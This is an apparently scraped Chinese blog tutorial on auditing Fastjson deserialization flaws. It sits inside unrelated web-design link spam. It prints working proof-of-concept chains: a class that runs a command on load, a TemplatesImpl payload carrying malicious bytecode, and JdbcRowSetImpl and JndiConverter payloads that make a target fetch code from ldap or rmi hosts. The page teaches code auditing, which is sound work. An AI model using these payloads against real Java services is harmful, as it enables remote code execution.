当前位置: 首页 > wzjs >正文

自建网站公司专门做汽车内饰的网站

自建网站公司,专门做汽车内饰的网站,营销qq是什么意思,赣州网络台一、fastjson反序列化审计思路 Fastjson是Alibaba开发的高性能JSON库,用于将数据在JSON和Java对象之间互相转换,不需要添加额外的依赖,能够直接跑在JDK上。Fastjson是自己实现的一套序列化和反序列化机制,不是用Java原生的序列化和…

一、fastjson反序列化审计思路
Fastjson是Alibaba开发的高性能JSON库,用于将数据在JSON和Java对象之间互相转换,不需要添加额外的依赖,能够直接跑在JDK上。Fastjson是自己实现的一套序列化和反序列化机制,不是用Java原生的序列化和反序列化机制。通过Fastjson反序列化漏洞,攻击者可以传入一个恶意构造的JSON内容,程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意函数,进而导致代码执行。如果构造函数、get/set方法、static静态代码块存在可利用的入口,则可能导致反序列化漏洞的存在。

二、fastjson反序列化本地代码验证
1.构造函数、get/set方法(需要public权限)、static静态代码块存在可利用的入口,则可能导致反序列化漏洞的存在。

study1
import java.io.IOException;
import java.io.Serializable;public class Study1 implements Serializable {private String name;private String baby;static{try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public    Study1(){try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public String getName(){try {Runtime.getRuntime().exec("calc");return name;} catch (IOException e) {throw new RuntimeException(e);}}public void setBaby(String baby){try {Runtime.getRuntime().exec("calc");this.baby=baby;} catch (IOException e) {throw new RuntimeException(e);}}
}入口执行
import com.alibaba.fastjson.JSON;
import org.junit.Test;public class FastJsonTest {@Testpublic void fastjson(){String jsonString = "{\"@type\":\"Study1\",\"baby\":\"ddds\"}";Object obj = JSON.parseObject(jsonString);System.out.println(obj);System.out.println(obj.getClass());}
}

在这里插入图片描述
2.基于Templatelmpl
影响范围: FastJson 1.2.22-1.2.24版本
限制: 需要设置Feature.SupportNonPublicField属性才能成功触发。
{“@type”:“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,“_bytecodes”:[“yv66vgAAADsAKAo…”],‘_name’:‘a.b’,‘_tfactory’:{},“_outputProperties”:{},“_version”:“1.0”,“allowedProtocols”:“all”}

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.apache.commons.codec.binary.Base64;
import org.junit.Test;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;public class Templatelmpl {private static String readClass(String classFilePath) {ByteArrayOutputStream bos = new ByteArrayOutputStream();try {IOUtils.copy(new FileInputStream(new File(classFilePath)), bos);} catch (IOException e) {e.printStackTrace();}return Base64.encodeBase64String(bos.toByteArray());}@Testpublic void Temp(){String classFilePath = "src\\test\\java\\poc.class";String evilCode = readClass(classFilePath);String text1 = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{},\"_outputProperties\":{ }," +",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}";System.out.println(text1);Object obj = JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);}
}poc.java---poc.class
import java.io.IOException;
import java.io.Serializable;public class poc implements Serializable {static {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public poc() {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}public static void main(String[] args) throws IOException {poc p = new poc();}
}

三、常见历史fastjson反序列化漏洞
基于JdbcRowSetImpl(可以远程利用,黑盒也能测)
由于是利用JNDI注入漏洞来触发的,因此主要的限制因素是JDK版本。RMI利用的JDK版本<=6u141、7u131、8u121,LDAP利用的JDK版本<=6u211、 7u201、8u191。
1.2.22-1.2.24
String payload = “{”@type":“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://192.168.0.8:1099/poc”, “autoCommit”:true}“;
1.2.48
String payload = “{“name”:{”@type”:“java.lang.Class”,“val”:“com.sun.rowset.JdbcRowSetImpl”},“x”:{“@type”:“com.sun.rowset.JdbcRowSetImpl”,“dataSourceName”:“ldap://127.0.0.1:1389/#EvilCalc1”,“autoCommit”:true}}}“;
1.2.62
String text1 = “{”@type”:“org.apache.xbean.propertyeditor.JndiConverter”,“AsText”:“rmi://127.0.0.1:1099/exploit”}";

poc
import com.alibaba.fastjson.JSON;
public class JdbcRowSetImpl {public static void main(String[] args) {String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/poc\", \"autoCommit\":true}";JSON.parse(payload);}
}

开启ldap和web服务
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
补充:Fastjson1.2.25版本新增了checkAutoType方法,设置了autotype开关,对@type字段进行限制。
四、实战中怎么去做fastjson的代码审计

审计0day:
查看pom文件确认使用fastjson组件(非maven项目去找jar,往往放在一个lib,比如webapp/web-inf/lib)-------查找反序列化函数------构造利用点如构造函数、get/set方法(需要public权限)、static静态代码块------利用验证

审计历史漏洞:
查看pom文件(非maven项目去找jar,往往放在一个lib,比如webapp/web-inf/lib)确认使用fastson组件------确认使用fastjon组件版本-------寻找反序列化构造点------poc调用验证

http://www.dtcms.com/wzjs/804328.html

相关文章:

  • 一个人做商城网站旅游网站源码 wordpress模板 v1.0
  • 网站添加google地图便宜机票的网站建设
  • 建娱乐网站有哪些网站做的比较好
  • 做网站备案的公司网站建设使用情况
  • 江苏省住房与城乡建设厅网站首页wordpress指定关键词自动内链
  • 商城网站模板源码微信营销软件平台
  • 拼客多网站多少钱可以做可以做推广的平台
  • 品牌网站建设小7蝌蚪视频剪辑培训班
  • 手机网站内容规划all import wordpress
  • 网站建设维护方向上海到北京专线物流
  • 网站模板设计师要求学校建设网站拓扑图
  • 公司网站百度推广dw个人网站模板下载
  • 专业外贸网站制作公司宁波网站建设 慕枫科技
  • 彩票网站 建设wordpress 路径标签
  • 深圳龙华汽车网站建设广州网站建设联系新科海珠
  • 网站建设学习学校职业教育网站建设方案
  • 大连网站建设服务公司推广公司违法吗
  • python 网站开发教程百度推广营销方案
  • 谷歌英文网站优化wordpress安装位置
  • 浙江公司网站建设制作在linux上做网站搭建
  • 做网站翻页怎么做邯郸市城市建设局网站
  • 网站图片怎么做才有吸引力雷州市住房和城乡规划建设局网站
  • 找公司建网站重庆百度地图都导航不出来的
  • 做网站多大华为网站搭建
  • 河北涿州建设局网站佛山外贸网站建设公司
  • 网站内容维护更新方法建站之星安装说明
  • 房子装修设计app自动seo优化
  • 南京网站开发南京乐识专业phpcms漏洞
  • 建设旅游网站的意义破解php网站后台账号密码
  • 专做商铺中介网站上海 网站开发 外包